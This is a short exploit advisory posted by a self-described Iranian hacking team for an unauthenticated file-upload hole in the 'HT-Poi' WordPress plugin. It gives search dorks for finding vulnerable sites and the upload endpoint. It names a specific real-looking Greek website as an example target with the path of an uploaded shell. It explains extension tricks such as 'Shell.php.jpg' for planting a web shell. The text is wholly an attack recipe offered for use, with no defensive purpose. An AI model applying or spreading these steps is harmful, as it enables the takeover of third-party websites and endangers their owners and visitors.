-------------------- IN The NAme OF God -------------------- -====WordPress HT-Poi Plugin Remote File Uploader (RfU)====- # Exploit Title: WordPress HT-Poi Plugin Remote File Uploader (RfU) # Exploit Author: Mr.XpR # Tested on: BackTrack # Script Site : http://wordpress.org # MAil : No0PM[at]yahoo[dot]com -====Dork====- inurl:/wp-content/plugins/HT-Poi/ inurl:/plugins/HT-Poi/ -====Exploit====- http://Site.Com/wp-content/plugins/HT-Poi/file_upload.php -====Example====- http://acropoliselect.gr/wp-content/plugins/HT-Poi/file_upload.php -====Load Sh3ll====- http://acropoliselect.gr/wp-content/plugins/HT-Poi/upimages/Shell.php.jpg -====information====- Upload Your Shell ~~~> Shell.php Or Shell.php.jpg OR Shell.php;.jpg Load Shell And Enjoye ~~~> wp-content/plugins/HT-Poi/upimages/Shell.php.jpg -====Tnx To====- Just Persian Gulf ~~~~ > W3 Are Persian Hackerz MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ... And All IraNHAck Security Team Members iranhack.org